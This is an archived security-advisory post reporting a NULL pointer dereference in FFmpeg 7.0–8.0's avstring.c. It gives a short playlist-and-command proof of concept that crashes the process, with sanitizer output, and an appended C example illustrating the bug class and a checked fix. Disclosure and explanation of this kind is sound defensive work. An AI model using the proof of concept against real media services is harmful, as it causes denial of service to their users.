FFmpeg 7.0+ NULL Pointer Dereference in FFmpeg String Handling (avstring.c)
FFmpeg versions 7.0 through 8.0 contain a NULL pointer dereference vulnerability caused by improper validation in libavutil/avstring.c; it is triggered when certain strings are processed and results in a denial of service. 2025-9-8 22:28:31 Author: seclists.org


Full Disclosure mailing list archives


From: Ron E <ronaldjedgerson () gmail com>
Date: Sun, 7 Sep 2025 01:47:46 -0400

Improper validation in libavutil/avstring.c allows a NULL pointer
dereference when processing certain strings in HLS contexts. UBSan reports
"applying zero offset to null pointer." Triggers denial of service (DoS)
when FFmpeg processes malicious playlists or malformed URLs. (FFmpeg 7.0 –
8.0)

*Impact:*

   - Consistently crashes the process (DoS).
   - Exploitation beyond denial of service is unlikely on modern OSes.


*Proof of Concept:*

#EXTM3U
#EXTINF:10,
http://example.com/dummy.ts

./ffmpeg -i malicious.m3u8 -c copy out.mp4


*Output:*

libavutil/avstring.c:455:15: runtime error: applying zero offset to null pointer
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
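The sanitizer message quoted in the post describes a general C bug class rather than anything specific to FFmpeg: adding an offset to a null pointer is undefined behaviour even when the offset is zero, and UBSan reports exactly that. The following is an added example, not FFmpeg's avstring.c and not the poster's code, showing the pattern on a hypothetical HLS tag helper: the null-plus-offset arithmetic that UBSan flags, the checked form a defender would want in its place, and a playlist walk that rejects malformed tag lines before any string routine runs on them. Every function name and the sample playlist are constructed for this illustration.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* The raw bug class. In C, pointer arithmetic on a null pointer is undefined
 * even when the offset is 0. Built with -fsanitize=undefined, the UBSan
 * runtime reports skip_unchecked(NULL, 0) as "applying zero offset to null
 * pointer" (the wording in the advisory) and skip_unchecked(NULL, 1) as
 * "applying non-zero offset ... to null pointer". Without the sanitizer the
 * zero-offset case usually passes silently and the non-zero case becomes a
 * crash at the next read. Hypothetical helper, not FFmpeg's code. */
static const char *skip_unchecked(const char *s, size_t n)
{
    return s + n;                           /* UB when s == NULL */
}

/* How the pattern typically reaches a string parser: a lookup that can
 * return NULL (here strchr on a tag line without ':') feeds straight into
 * pointer arithmetic. Hypothetical helper, not FFmpeg's code. */
static const char *tag_value_unchecked(const char *line)
{
    const char *colon = strchr(line, ':');  /* NULL when no ':' is present */
    return colon + 1;                       /* UB when colon == NULL */
}

/* Hardened form: every pointer is checked before arithmetic, and a malformed
 * line is reported to the caller as NULL instead of crashing the process. */
static const char *tag_value_checked(const char *line)
{
    if (!line)
        return NULL;
    const char *colon = strchr(line, ':');
    if (!colon)
        return NULL;                        /* tag without a value */
    return colon + 1;                       /* safe: colon is non-NULL */
}

/* Walk a playlist line by line with the checked helper and count the #EXT
 * tag lines that carry no value, so a caller can reject the playlist up
 * front rather than dereference NULL deep inside a string routine. */
static int count_malformed_tags(const char *playlist)
{
    int malformed = 0;
    char line[256];
    const char *p = playlist;

    while (*p) {
        const char *nl = strchr(p, '\n');
        size_t len = nl ? (size_t)(nl - p) : strlen(p);
        if (len >= sizeof line)
            len = sizeof line - 1;          /* truncate overlong lines */
        memcpy(line, p, len);
        line[len] = '\0';

        /* #EXTM3U is the header and legitimately has no value. */
        if (strncmp(line, "#EXT", 4) == 0 && strcmp(line, "#EXTM3U") != 0 &&
            tag_value_checked(line) == NULL)
            malformed++;

        p = nl ? nl + 1 : p + len;
    }
    return malformed;
}

/* Constructed sample playlist: header, a well-formed tag, a tag missing its
 * value, and a segment URI. */
static const char sample_playlist[] =
    "#EXTM3U\n"
    "#EXTINF:10,\n"
    "#EXT-X-KEY\n"
    "http://example.com/dummy.ts\n";

int main(void)
{
    /* Only well-formed input reaches the unchecked helpers here. */
    printf("unchecked on a valid line: %s\n", tag_value_unchecked("#EXTINF:10,"));
    printf("skip 0 on a real string: %s\n", skip_unchecked("abc", 0));
    printf("checked EXTINF value: %s\n", tag_value_checked("#EXTINF:10,"));
    printf("malformed tags in sample: %d\n",
           count_malformed_tags(sample_playlist));
    return 0;
}
```

Build with `cc -fsanitize=undefined -g example.c` to get the runtime report; calling `skip_unchecked(NULL, 0)` under the sanitizer produces the exact "applying zero offset to null pointer" wording quoted above. That is the reason to treat the message as a genuine NULL-handling defect even when an unsanitized build does not crash on the same input: the zero-offset case is the one that hides until a code path applies a non-zero offset to the same pointer.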


Source: https://seclists.org/fulldisclosure/2025/Sep/28